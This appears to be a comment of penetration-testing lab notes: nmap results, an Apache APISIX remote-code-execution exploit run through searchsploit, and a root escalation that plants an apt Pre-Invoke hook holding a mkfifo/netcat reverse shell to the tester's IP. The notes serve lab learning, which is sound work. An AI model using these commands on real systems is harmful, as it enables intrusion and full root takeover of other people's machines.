WDavid404
commented
4 months ago PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Upright
| http-methods:
|_ Supported Methods: GET HEAD
3306/tcp open mysql syn-ack ttl 61 MySQL (unauthorized)
8080/tcp closed http-proxy reset ttl 61
43500/tcp open http syn-ack ttl 61 OpenResty web app server
|_http-server-header: APISIX/2.8
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.220:43500/FUZZ
--> no info
Access 80/port, no useful info
Check nmap result again:
searchsploit APISIX -->Apache APISIX 2.12.1 - Remote Code Execution (RCE) | multiple/remote/50829.py
python3 50829.py http://192.168.243.220:43500/ 192.168.45.192 4444
# Note: Must have "http://"--->
cat /etc/crontab
-->
Cannot see /root/run.sh Search "apt-get update privilege escalation", found this article --> https://systemweakness.com/code-execution-with-apt-update-in-crontab-privesc-in-linux-e6d6ffa8d076
Make sure "/etc/apt/apt.conf.d/" is writable --> linpeas ensure it.
cd /etc/apt/apt.conf.d/
echo 'apt::Update::Pre-Invoke {"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.192 8000 >/tmp/f"};' > shell
Meanwhile,
Key points: